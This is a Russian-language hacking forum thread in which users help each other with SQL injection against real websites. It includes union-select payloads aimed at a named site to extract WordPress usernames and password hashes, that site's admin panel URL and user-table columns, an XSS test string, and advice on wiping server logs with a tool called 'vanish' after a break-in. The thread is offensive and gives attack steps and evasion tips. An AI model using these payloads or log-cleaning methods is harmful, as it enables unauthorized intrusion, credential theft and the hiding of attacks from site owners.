Вот админка http://www.sngboard.ru/Admin/ (надо с большой буквы). 2 hulk Вот все колонки в этой таблице email id firstname lastname password phone
@diznt /* пробовал? Если использовать --, то нужно так: /index.php?pid=-1'+union+select+1,2,3,4,5,6,7--%20- также пробуй # /index.php?pid=-1'+union+select+1,2,3,4,5,6,7%23
Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- . Возможно двойной запрос? Хотя ошибка синтаксическая. Попробуй подзапросы +and+substring(version(),1,1)=5-- (4,3)
@beerhack чтение дир возможно благодаря FreeBSD, юзай вот этот скрипт http://www.blacktoad.info/releases/dir_parsing.txt @jokester в MySQL регистр таблиц и колонок не имеет значения
Ты вместо того, что-бы написать это посмотрел-бы линк. Я не говорил про mysql, я говорил про этот пример Вот линки : http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_login,user_pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+wordpress.WP_USERS/* Table 'wordpress.WP_USERS' doesn't exist http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_login,user_pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+wordpress.wp_users/* вывод
http://dev.mysql.com/doc/refman/5.0/en/comments.html http://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html
при добавлении коммента "><script>alert()</script> к фотке не одном из сайтов имеем сообщение: Fatal error: Cannot redeclare class_mysql::$sql_login in /usr/local/www/worlds.ru/req/mysql.class on line 7 что это может быть? ps/ сильно не пинать я только начинаю) -------------EDIT--------------------- комменты и так не работают... спс desTiny ) -------------EDIT---------------------
Как понять? При подборе столбцов через order by принтит стандартную ошибку Unknown column '100' in 'order clause' Но и при 1 пишет Unknown column '1' in 'order clause' Юнион селект эррорят. Первый раз сталкиваюсь.
Imperou$: потому что ты, видимо, пишешь order by '1' вместо order by 1 NetSter, а так просто коммент добавляется, если без всяких скриптов и тп?
Если сайт рабочий, и через какие либо праметры передаются значения в БД, то ИМХО в таблице есть хоть 1 столбцы! Возможно админ сделал фейковую скулю. Дай мне url я посмотрю...
А может используются несколько запросов с одинаковыми параметрами? И ни в том ни в другом случае запрос не получается правильным...
desTiny Всё правильно пишу. Просто вывода не было. Разобрался,скуль в другом скрипте на этом сайте. Большое спасибо DimOnOID
Народ я к примеру похекал сайт (через скуль) и хочу удалить логи (там же вроде при запросе в скуле, все записываеться в логи) при этом есть полный доступ к серверу! как это мне сделать?
Что б почистить логи можешь воспользоваться "ванишем", и у тебя обязательно должны быть права рута! иначе никак.....
У тебя нет доступа к логам апача. Только если ты пользователь с максимальными правами(в линуксе - root), ты можешь их почистить. Хз где лежат в твоем случае. Скорей всего на уровень выше от корня www-дирректории.
